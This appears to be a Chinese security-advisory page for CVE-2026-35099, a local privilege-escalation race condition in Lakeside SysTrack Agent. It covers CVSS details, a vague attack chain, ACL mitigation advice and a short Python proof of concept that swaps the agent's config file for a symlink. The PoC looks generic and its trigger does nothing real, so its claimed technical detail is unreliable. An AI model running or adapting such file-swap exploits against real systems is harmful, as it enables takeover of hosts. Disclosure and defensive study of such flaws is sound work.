CVE-2026-35099 CVSS 7.4 高危

CVE-2026-35099 Lakeside SysTrack Agent本地提权漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35099

漏洞类型

竞态条件

CVSS评分

7.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Lakeside SysTrack Agent

漏洞概述

Lakeside SysTrack Agent 11（11.5.0.15之前版本）存在严重的竞态条件漏洞。该漏洞允许攻击者在本地利用时间差漏洞，绕过安全检查，将权限提升至SYSTEM级别。成功利用此漏洞可能导致攻击者完全控制受影响的主机，窃取敏感数据、破坏系统完整性或中断服务运行，建议用户尽快安装官方修复补丁。

技术细节

该漏洞的核心在于Lakeside SysTrack Agent在执行特定文件操作或权限检查时，未能正确处理并发请求，产生了典型的“竞态条件”。具体而言，Agent在检查资源状态与实际使用资源之间存在一个时间窗口。本地攻击者无需任何认证，即可利用这一极短的时间差，通过多线程或高频率操作，将合法的文件或系统对象替换为恶意构造的对象。由于Agent服务通常以SYSTEM权限运行，当它随后操作被篡改的资源时，便会执行攻击者的恶意代码或指令，从而实现从普通用户权限到SYSTEM权限的垂直提升。此攻击过程无需用户交互，隐蔽性较高，对系统的机密性、完整性和可用性构成严重威胁。

攻击链分析

STEP 1

步骤1

攻击者获取对运行Lakeside SysTrack Agent的本地系统的访问权限。

STEP 2

步骤2

攻击者分析Agent行为，识别出文件操作中的竞态条件窗口（TOCTOU）。

STEP 3

步骤3

攻击者执行并发脚本，在Agent检查文件和加载文件的时间间隔内，替换关键配置文件或DLL。

STEP 4

步骤4

Agent以SYSTEM权限加载恶意文件，导致攻击者获得SYSTEM级别的shell或控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import time
import threading

# PoC for Race Condition in Lakeside SysTrack Agent (CVE-2026-35099)
# This script attempts to exploit a TOCTOU vulnerability to replace a config file.

TARGET_FILE = "C:\\Program Files\\SysTrack\\Agent\\config.ini"
MALICIOUS_FILE = "C:\\temp\\malicious_config.ini"

def replace_file():
    while True:
        try:
            # Attempt to replace the target file with a symlink or malicious file
            if os.path.exists(TARGET_FILE):
                os.remove(TARGET_FILE)
                os.symlink(MALICIOUS_FILE, TARGET_FILE)
                print("[+] File replaced successfully!")
                break
        except Exception as e:
            continue

def trigger_agent():
    # Simulate the agent checking the file
    # In a real scenario, this would be waiting for the service to restart or check config
    time.sleep(0.1)
    print("[*] Triggering agent operation...")

# Start threads to race
print("[*] Starting race condition exploit...")
t1 = threading.Thread(target=replace_file)
t2 = threading.Thread(target=trigger_agent)
t1.start()
t2.start()
t1.join()
t2.join()

影响范围

Lakeside SysTrack Agent 11 < 11.5.0.15

防御指南

临时缓解措施

如果无法立即升级，请严格限制对SysTrack Agent安装目录及配置文件的访问控制列表（ACL），仅允许SYSTEM账户拥有写入权限，并监控本地系统中异常的文件替换行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表